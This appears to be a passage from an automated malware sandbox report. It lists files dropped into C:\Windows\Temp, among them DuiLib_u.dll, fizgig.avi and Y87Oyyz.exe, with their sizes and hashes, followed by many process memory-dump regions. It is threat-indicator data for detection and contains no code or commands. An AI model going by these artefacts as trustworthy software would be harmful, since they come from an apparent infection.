                                    • C:\Windows\Temp\{4956A76E-DEB4-45ED-8D69-7E9A2D141050}\.ba\DuiLib_u.dll

                                      Filesize

                                      860KB

                                      MD5

                                      83495e5db2654bcec3948ee486424599

                                      SHA1

                                      8a86af21864f565567cc4cc1f021f08b2e9febaa

                                      SHA256

                                      e770be8fba337cc01e24c7f059368526a804d2af64136a39bb84adeebcf9cfbc

                                      SHA512

                                      b4dbdfff0501fb3ba912556a25a64da38d3872bc31c94cc2395d6567b786cbbe104fd6178f019f8efba08dc5abcd964616a99d886b74aa80014b1c09ba7e9c41

                                    • C:\Windows\Temp\{4956A76E-DEB4-45ED-8D69-7E9A2D141050}\.ba\diorama.json

                                      Filesize

                                      55KB

                                      MD5

                                      61947293abc79f5e003ac42d9b7489f4

                                      SHA1

                                      9386c10a6441a395385007130f1aa6916b22881a

                                      SHA256

                                      57414bda77d468f6573672aaa7b1b68e38ae511ab5be187c227232a054c257bb

                                      SHA512

                                      6c90d23c9ce0a3d2880c7e0bf056df32de9701ce5e3c210967e04a67c7730fc9b341ed46641390cd49a645c49c6c6ab7a63710df0814ae75cfb32d7fef43903f

                                    • C:\Windows\Temp\{4956A76E-DEB4-45ED-8D69-7E9A2D141050}\.ba\fizgig.avi

                                      Filesize

                                      4.4MB

                                      MD5

                                      5d66fb6cc0be6e19ce2ac0e06c46a8cc

                                      SHA1

                                      90aeb2f3c4ec474779d2c92d3880dcd4611c0ea8

                                      SHA256

                                      e5b81417ed9c35e57a92e739e1a64aedd83edb3cc759b6a18b1a637bcfc3b8f2

                                      SHA512

                                      1fb73e90adf0f20d6061135d01fa45674dbcd67791978a663911e69fa11ea93561328a93c8fe582b33cabb2096ad15cc9daa46eb4d07895a70134e1a5b81e68b

                                    • C:\Windows\Temp\{4956A76E-DEB4-45ED-8D69-7E9A2D141050}\.ba\msvcp140.dll

                                      Filesize

                                      437KB

                                      MD5

                                      e9f00dd8746712610706cbeffd8df0bd

                                      SHA1

                                      5004d98c89a40ebf35f51407553e38e5ca16fb98

                                      SHA256

                                      4cb882621a3d1c6283570447f842801b396db1b3dcd2e01c2f7002efd66a0a97

                                      SHA512

                                      4d1ce1fc92cea60859b27ca95ca1d1a7c2bec4e2356f87659a69bab9c1befa7a94a2c64669cef1c9dadf9d38ab77e836fe69acdda0f95fa1b32cba9e8c6bb554

                                    • C:\Windows\Temp\{4956A76E-DEB4-45ED-8D69-7E9A2D141050}\.ba\vcruntime140.dll

                                      Filesize

                                      74KB

                                      MD5

                                      a554e4f1addc0c2c4ebb93d66b790796

                                      SHA1

                                      9fbd1d222da47240db92cd6c50625eb0cf650f61

                                      SHA256

                                      e610cdac0a37147919032d0d723b967276c217ff06ea402f098696ab4112512a

                                      SHA512

                                      5f3253f071da3e0110def888682d255186f2e2a30a8480791c0cad74029420033b5c90f818ae845b5f041ee4005f6de174a687aca8f858371026423f017902cc

                                    • C:\Windows\Temp\{5D1699EF-D116-49B6-A148-288D6312C99E}\.cr\Y87Oyyz.exe

                                      Filesize

                                      5.6MB

                                      MD5

                                      958c9e0114b96e568a2cc7f44fed29d8

                                      SHA1

                                      bfe95d84a6243da42e0e0e89a7c6a5e87ce96487

                                      SHA256

                                      935aac20de79946cbcd537f5c15f166449bb218bd41f01f8130ff1b795421d8a

                                      SHA512

                                      8ed92a2f09cca8364727a9f057f7fcc42986d696b6c4e77b2695c0694b05046c92679cb13ba8926aeabf59afbbdd28b0075554cab487d5cf883bde6815c6d592

                                    • memory/8-139-0x00000000008A0000-0x00000000009FC000-memory.dmp

                                      Filesize

                                      1.4MB

                                    • memory/8-187-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-171-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-169-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-165-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-163-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-161-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-159-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-157-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-155-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-153-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-149-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-147-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-145-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-143-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-175-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-140-0x00000000052B0000-0x00000000053E0000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-1468-0x0000000005580000-0x000000000560A000-memory.dmp

                                      Filesize

                                      552KB

                                    • memory/8-1469-0x0000000005650000-0x00000000056D6000-memory.dmp

                                      Filesize

                                      536KB

                                    • memory/8-1470-0x0000000005830000-0x000000000587C000-memory.dmp

                                      Filesize

                                      304KB

                                    • memory/8-1471-0x0000000005FB0000-0x0000000006004000-memory.dmp

                                      Filesize

                                      336KB

                                    • memory/8-141-0x0000000005480000-0x0000000005512000-memory.dmp

                                      Filesize

                                      584KB

                                    • memory/8-177-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-142-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-167-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-179-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-173-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-181-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-185-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-151-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-183-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-191-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/8-189-0x00000000052B0000-0x00000000053DA000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/32-85-0x0000000000BC0000-0x0000000000C38000-memory.dmp

                                      Filesize

                                      480KB

                                    • memory/536-46-0x0000000000210000-0x00000000006D6000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/536-32-0x0000000000210000-0x00000000006D6000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/1360-1606-0x0000000000A10000-0x0000000000ED6000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/1360-1609-0x0000000000A10000-0x0000000000ED6000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/1464-983-0x0000000000AA0000-0x00000000016D1000-memory.dmp

                                      Filesize

                                      12.2MB

                                    • memory/1464-3405-0x0000000000BA0000-0x000000000103B000-memory.dmp

                                      Filesize

                                      4.6MB

                                    • memory/1464-3400-0x0000000000BA0000-0x000000000103B000-memory.dmp

                                      Filesize

                                      4.6MB

                                    • memory/1464-108-0x0000000000AA0000-0x00000000016D1000-memory.dmp

                                      Filesize

                                      12.2MB

                                    • memory/1464-1487-0x0000000000AA0000-0x00000000016D1000-memory.dmp

                                      Filesize

                                      12.2MB

                                    • memory/2152-87-0x0000000000400000-0x0000000000465000-memory.dmp

                                      Filesize

                                      404KB

                                    • memory/2152-89-0x0000000000400000-0x0000000000465000-memory.dmp

                                      Filesize

                                      404KB

                                    • memory/2208-4-0x00000000058A0000-0x00000000058C2000-memory.dmp

                                      Filesize

                                      136KB

                                    • memory/2208-3-0x0000000005A20000-0x0000000006048000-memory.dmp

                                      Filesize

                                      6.2MB

                                    • memory/2208-19-0x0000000007E50000-0x00000000084CA000-memory.dmp

                                      Filesize

                                      6.5MB

                                    • memory/2208-22-0x0000000007C70000-0x0000000007D06000-memory.dmp

                                      Filesize

                                      600KB

                                    • memory/2208-23-0x0000000007BD0000-0x0000000007BF2000-memory.dmp

                                      Filesize

                                      136KB

                                    • memory/2208-24-0x0000000008A80000-0x0000000009024000-memory.dmp

                                      Filesize

                                      5.6MB

                                    • memory/2208-2-0x0000000003130000-0x0000000003166000-memory.dmp

                                      Filesize

                                      216KB

                                    • memory/2208-20-0x0000000006C70000-0x0000000006C8A000-memory.dmp

                                      Filesize

                                      104KB

                                    • memory/2208-18-0x0000000006760000-0x00000000067AC000-memory.dmp

                                      Filesize

                                      304KB

                                    • memory/2208-16-0x0000000006310000-0x0000000006664000-memory.dmp

                                      Filesize

                                      3.3MB

                                    • memory/2208-5-0x0000000006050000-0x00000000060B6000-memory.dmp

                                      Filesize

                                      408KB

                                    • memory/2208-6-0x00000000060C0000-0x0000000006126000-memory.dmp

                                      Filesize

                                      408KB

                                    • memory/2208-17-0x0000000006710000-0x000000000672E000-memory.dmp

                                      Filesize

                                      120KB

                                    • memory/2256-67-0x0000000000240000-0x0000000000706000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/2300-1548-0x00000000006B0000-0x00000000009C0000-memory.dmp

                                      Filesize

                                      3.1MB

                                    • memory/2300-1605-0x00000000006B0000-0x00000000009C0000-memory.dmp

                                      Filesize

                                      3.1MB

                                    • memory/2300-1577-0x00000000006B0000-0x00000000009C0000-memory.dmp

                                      Filesize

                                      3.1MB

                                    • memory/2816-5268-0x0000000000EA0000-0x0000000000F00000-memory.dmp

                                      Filesize

                                      384KB

                                    • memory/4684-111-0x0000000000A30000-0x0000000001438000-memory.dmp

                                      Filesize

                                      10.0MB

                                    • memory/4684-92-0x0000000000A30000-0x0000000001438000-memory.dmp

                                      Filesize

                                      10.0MB

                                    • memory/4684-65-0x0000000000A30000-0x0000000001438000-memory.dmp

                                      Filesize

                                      10.0MB

                                    • memory/4684-91-0x0000000000A30000-0x0000000001438000-memory.dmp

                                      Filesize

                                      10.0MB

                                    • memory/4740-4192-0x0000021E6E020000-0x0000021E6E042000-memory.dmp

                                      Filesize

                                      136KB

                                    • memory/4924-109-0x0000000000400000-0x000000000042F000-memory.dmp

                                      Filesize

                                      188KB

                                    • memory/4924-93-0x0000000000400000-0x000000000042F000-memory.dmp

                                      Filesize

                                      188KB

                                    • memory/4924-115-0x0000000010000000-0x000000001001C000-memory.dmp

                                      Filesize

                                      112KB

                                    • memory/5032-56-0x0000000000240000-0x0000000000706000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/5032-47-0x0000000000240000-0x0000000000706000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/5032-57-0x0000000000240000-0x0000000000706000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/5032-90-0x0000000000240000-0x0000000000706000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/5032-120-0x0000000000240000-0x0000000000706000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/5132-1575-0x0000000000040000-0x00000000006D6000-memory.dmp

                                      Filesize

                                      6.6MB

                                    • memory/5132-1579-0x0000000000040000-0x00000000006D6000-memory.dmp

                                      Filesize

                                      6.6MB

                                    • memory/5248-4362-0x0000024535CC0000-0x0000024535CDA000-memory.dmp

                                      Filesize

                                      104KB

                                    • memory/5248-4297-0x0000024535A50000-0x0000024535B05000-memory.dmp

                                      Filesize

                                      724KB

                                    • memory/5248-4317-0x0000024535C80000-0x0000024535C9C000-memory.dmp

                                      Filesize

                                      112KB

                                    • memory/5248-4364-0x0000024535C70000-0x0000024535C78000-memory.dmp

                                      Filesize

                                      32KB

                                    • memory/5248-4381-0x0000024535CA0000-0x0000024535CA6000-memory.dmp

                                      Filesize

                                      24KB

                                    • memory/5248-4385-0x0000024535CB0000-0x0000024535CBA000-memory.dmp

                                      Filesize

                                      40KB

                                    • memory/5248-4307-0x0000024535B10000-0x0000024535B1A000-memory.dmp

                                      Filesize

                                      40KB

                                    • memory/5248-4290-0x0000024535A30000-0x0000024535A4C000-memory.dmp

                                      Filesize

                                      112KB

                                    • memory/5248-4353-0x0000024535C60000-0x0000024535C6A000-memory.dmp

                                      Filesize

                                      40KB

                                    • memory/5508-1583-0x0000000000240000-0x0000000000706000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/5680-1843-0x0000000000320000-0x000000000078A000-memory.dmp

                                      Filesize

                                      4.4MB

                                    • memory/5680-1902-0x0000000000320000-0x000000000078A000-memory.dmp

                                      Filesize

                                      4.4MB

                                    • memory/5680-1904-0x0000000000320000-0x000000000078A000-memory.dmp

                                      Filesize

                                      4.4MB

                                    • memory/5680-3399-0x0000000000320000-0x000000000078A000-memory.dmp

                                      Filesize

                                      4.4MB

                                    • memory/5680-3403-0x0000000000320000-0x000000000078A000-memory.dmp

                                      Filesize

                                      4.4MB

                                    • memory/5792-1516-0x0000000000EB0000-0x0000000001359000-memory.dmp

                                      Filesize

                                      4.7MB

                                    • memory/5792-1512-0x0000000000EB0000-0x0000000001359000-memory.dmp

                                      Filesize

                                      4.7MB

                                    • memory/5884-5975-0x0000000000240000-0x0000000000706000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/5884-5977-0x0000000000240000-0x0000000000706000-memory.dmp

                                      Filesize

                                      4.8MB

                                    • memory/6640-3558-0x00000000007C0000-0x0000000000830000-memory.dmp

                                      Filesize

                                      448KB

                                    • memory/7092-4831-0x0000024BB5ED0000-0x0000024BB5EE2000-memory.dmp

                                      Filesize

                                      72KB

                                    • memory/7092-4840-0x0000024BB6270000-0x0000024BB6280000-memory.dmp

                                      Filesize

                                      64KB